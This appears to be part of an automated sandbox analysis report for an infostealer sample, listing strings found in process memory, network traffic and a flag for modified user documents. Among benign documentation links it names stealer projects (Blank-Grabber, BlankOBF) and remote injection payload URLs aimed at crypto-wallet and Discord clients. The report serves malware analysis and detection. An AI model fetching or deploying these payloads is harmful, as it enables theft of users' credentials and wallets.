                        Source: program.exe, 00000008.00000002.1938239957.00000237A4200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4284000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4284000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
                        Source: program.exe, 00000008.00000002.1938022235.00000237A29C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: program.exe, 00000008.00000002.1940797595.00000237A4EE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                        Source: program.exe, 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
                        Source: program.exe, 00000008.00000003.1538839445.00000237A4EE8000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1539582837.00000237A4BB4000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1539939884.00000237A4BB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
                        Source: powershell.exe, 00000033.00000002.1693664914.000001F881910000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: program.exe, 00000008.00000002.1938022235.00000237A29C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://github.com/hackirby/wallets-injection/raw/main/atomic.asarhttps://github.com/hackirby/wallet
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4284000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                        Source: program.exe, 00000008.00000002.1938022235.00000237A29C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                        Source: program.exe, 00000008.00000002.1938022235.00000237A29C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                        Source: program.exe, 00000008.00000002.1938769127.00000237A4838000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1550346820.00000237A4819000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1550188976.00000237A4C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
                        Source: program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
                        Source: program.exe, 00000008.00000002.1938022235.00000237A29C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                        Source: program.exe, 00000008.00000002.1940797595.00000237A4EE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                        Source: program.exe, 00000008.00000002.1938769127.00000237A46E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                        Source: program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                        Source: program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
                        Source: program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/32902
                        Source: powershell.exe, 00000033.00000002.1693664914.000001F880ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: program.exe, 00000008.00000002.1939870839.00000237A4D8E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1935121901.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1593036472.00000237A4D8E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1666115991.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939908324.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E16000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936998736.00000237A4D8B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1749300110.00000237A4D8B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1938769127.00000237A47E8000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1589347367.00000237A4E16000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                        Source: program.exe, 00000008.00000002.1938769127.00000237A47E8000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                        Source: program.exe, 00000008.00000002.1938769127.00000237A46E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1549428382.00000237A4819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                        Source: program.exe, 00000008.00000002.1939236456.00000237A4D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                        Source: program.exe, 00000008.00000003.1589347367.00000237A4E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpgJSON
                        Source: program.exe, 00000008.00000003.1544671007.00000237A4C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                        Source: program.exe, 00000008.00000002.1948709723.00000237A62D4000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1638117750.00000237A5916000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936233267.00000237A5914000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1743204693.00000237A5914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                        Source: program.exe, 00000008.00000003.1715550482.00000237A5914000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1638117750.00000237A5916000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1948709723.00000237A62E4000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936233267.00000237A5914000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1743204693.00000237A5914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                        Source: powershell.exe, 00000014.00000002.1825728289.0000023993632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1693664914.000001F88196B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1831279300.000001F8901BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1831279300.000001F89007B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000033.00000002.1693664914.000001F881653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 00000033.00000002.1693664914.000001F881653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                        Source: program.exe, 00000008.00000002.1941021680.00000237A50E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
                        Source: program.exe, 00000008.00000002.1938769127.00000237A4838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
                        Source: program.exe, 00000008.00000002.1938769127.00000237A4838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
                        Source: program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000002.1940908423.00000237A4FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
                        Source: program.exe, 00000008.00000003.1538192447.00000237A4790000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1528214217.00000237A44A1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1532943385.00000237A4790000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1537466500.00000237A4790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                        Source: program.exe, 00000008.00000002.1953128317.00007FFBAA8E8000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                        Source: program.exe, 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.js1157920892103562487626
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                        Source: program.exe, 00000008.00000003.1599083346.00000237A4E68000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1590319286.00000237A5872000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1593084728.00000237A4E68000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1601850768.00000237A4E68000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1600386018.00000237A5872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                        Source: program.exe, 00000008.00000003.1592258018.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1601019406.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E82000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578004060.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1595529292.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1589347367.00000237A4E16000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1599043044.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1580291828.00000237A587E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: program.exe, 00000008.00000003.1592258018.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E82000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578004060.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1595529292.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1580291828.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1938769127.00000237A46E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                        Source: program.exe, 00000008.00000003.1599043044.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                        Source: program.exe, 00000008.00000003.1601019406.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
                        Source: program.exe, 00000008.00000002.1939236456.00000237A4AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                        Source: program.exe, 00000008.00000002.1939236456.00000237A4AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
                        Source: program.exe, 00000008.00000002.1939870839.00000237A4D8E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1935121901.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1593036472.00000237A4D8E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1666115991.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939908324.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E16000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936998736.00000237A4D8B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1749300110.00000237A4D8B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1589347367.00000237A4E16000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                        Source: program.exe, 00000008.00000002.1941021680.00000237A50E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                        Source: program.exe, 00000008.00000002.1941021680.00000237A50E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                        Source: program.exe, 00000008.00000002.1941288303.00000237A53E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
                        Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
                        Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
                        Source: program.exe, 00000008.00000002.1941288303.00000237A5300000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                        Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
                        Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
                        Source: program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
                        Source: program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
                        Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
                        Source: program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
                        Source: program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
                        Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: program.exe, 00000008.00000002.1941288303.00000237A537C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1653852125.00000237A5815000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                        Source: program.exe, 00000008.00000002.1941288303.00000237A537C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
                        Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
                        Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
                        Source: program.exe, 00000008.00000003.1599083346.00000237A4E68000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1947748964.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1590319286.00000237A5872000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A5300000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1747910715.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1593084728.00000237A4E68000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1715550482.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1663641819.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1601850768.00000237A4E68000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936233267.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53E0000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1600386018.00000237A5872000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1638117750.00000237A5906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                        Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/
                        Source: program.exe, 00000008.00000003.1592258018.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E82000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578004060.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1595529292.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1666115991.00000237A4E49000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E4A000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1589347367.00000237A4E49000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1580291828.00000237A587E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: program.exe, 00000008.00000003.1601019406.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1599043044.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                        Source: program.exe, 00000008.00000003.1592258018.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E82000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578004060.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1595529292.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1589347367.00000237A4E16000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1580291828.00000237A587E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: program.exe, 00000008.00000003.1601019406.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1599043044.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                        Source: program.exe, 00000008.00000003.1592258018.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578004060.00000237A586E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1601019406.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E82000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578004060.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1595529292.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1599043044.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1580291828.00000237A587E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: program.exe, 00000008.00000003.1601019406.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1599043044.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                        Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53E0000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
                        Source: program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1951725180.00007FFBA666A000.00000004.00000001.01000000.00000015.sdmp, program.exe, 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpString found in binary or memory: https://www.openssl.org/H
                        Source: program.exe, 00000008.00000002.1953128317.00007FFBAA8E8000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.python.org/psf/license/)
                        Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                        Source: program.exe, 00000008.00000002.1939236456.00000237A4D49000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1938769127.00000237A46E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                        Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
                        Source: program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                        Source: program.exe, 00000008.00000002.1941288303.00000237A53E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                        Source: program.exe, 00000008.00000002.1938769127.00000237A47E8000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Modifies existing user documents (likely ransomware behavior)
                        Source: C:\Users\user\AppData\Roaming\program.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\QCFWYSKMHA.xlsxJump to behavior
